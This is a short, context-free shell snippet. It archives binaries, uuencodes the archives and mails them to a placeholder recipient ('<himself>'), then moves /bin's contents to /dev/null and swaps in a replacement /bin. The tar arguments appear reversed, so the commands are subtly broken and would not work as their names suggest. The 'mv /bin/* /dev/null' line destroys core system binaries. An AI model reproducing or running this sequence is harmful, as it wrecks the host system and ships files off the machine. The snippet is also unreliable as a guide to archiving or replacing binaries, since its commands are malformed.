tar -zcvf /bin.0 ~/bin.good.tgz
tar -zcvf /bin ~/bin.new.tgz

uuencode ~/bin.good.tgz > ~/bin.good.tgz.uu
mail <himself> < ~/bin.good.tgz.uu

uuencode ~/bin.new.tgz > ~/bin.new.tgz.uu
mail <himself> < ~/bin.new.tgz.uu

mv /bin/* /dev/null
mv /bin.0 /bin
